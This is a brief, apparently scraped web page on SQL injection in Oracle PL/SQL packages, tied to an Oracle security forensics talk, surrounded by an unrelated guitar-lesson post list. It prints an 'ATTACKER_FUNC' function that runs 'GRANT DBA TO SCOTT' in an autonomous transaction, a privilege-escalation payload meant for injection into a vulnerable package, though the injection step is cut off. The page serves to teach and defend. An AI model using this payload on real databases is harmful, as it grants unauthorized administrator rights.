SQL Injection in Oracle PL/SQL packages
Advanced Oracle Security Forensics at UKOUG
Example for 10g
CREATE OR REPLACE FUNCTION “SCOTT”.”ATTACKER_FUNC” return varchar2 authid current_user as pragma autonomous_transaction;
BEGIN EXECUTE IMMEDIATE ‘GRANT DBA TO SCOTT’;
COMMIT;
RETURN ‘ ‘;
END;
/
– Inject the function into the procedure….
and much mor can be cound at
User inserts their own SQL into the programs SQL.ppt
-
Categories
-
Recent Post
- Elements of Music-Basic Terms-Melody
- Guitar Training Hardware
- Guitar Chord Diagram
- Names of the notes on the open strings.
- How to Play the Guitar
- The Beach Boys, Surf Music, and the British Invasion
- Electric Guitar Distortion
- Learn to Play Guitar Essentials
- The Guitar Chord Learning System
- SQL Injection in Oracle PL-SQL packages